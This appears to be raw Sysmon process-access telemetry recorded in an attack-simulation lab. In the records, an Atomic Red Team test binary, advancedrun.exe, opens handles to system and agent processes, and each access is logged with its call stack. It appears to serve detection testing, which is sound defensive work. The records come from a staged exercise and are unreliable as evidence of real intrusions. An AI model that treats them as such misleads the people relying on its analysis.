17:59:00.678{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-2F00-000000002702}2440C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983072Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.678{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8C00-000000002702}4808C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983071Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.678{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF4-61EA-2D00-000000002702}2988C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983070Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.678{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB07-61EA-8800-000000002702}4836C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983069Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.678{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF2-61EA-2C00-000000002702}2896C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983068Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.678{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB00-61EA-7F00-000000002702}4768C:\Program 
Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983067Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.678{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF2-61EA-2B00-000000002702}2888C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983066Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.678{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-6100-000000002702}4392C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-2 10341000x80000000000000003983065Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.678{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF0-61EA-2900-000000002702}2760C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983064Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.663{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE8-61EA-2000-000000002702}1516C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003983063Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.678{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5C00-000000002702}4148C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983062Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.663{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1800-000000002702}1384C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003983061Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.663{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5B00-000000002702}4100C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983060Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.663{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5500-000000002702}4052C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983059Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.663{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1700-000000002702}1300C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983058Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.663{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF7-61EA-5300-000000002702}3936C:\Program 
Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983057Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
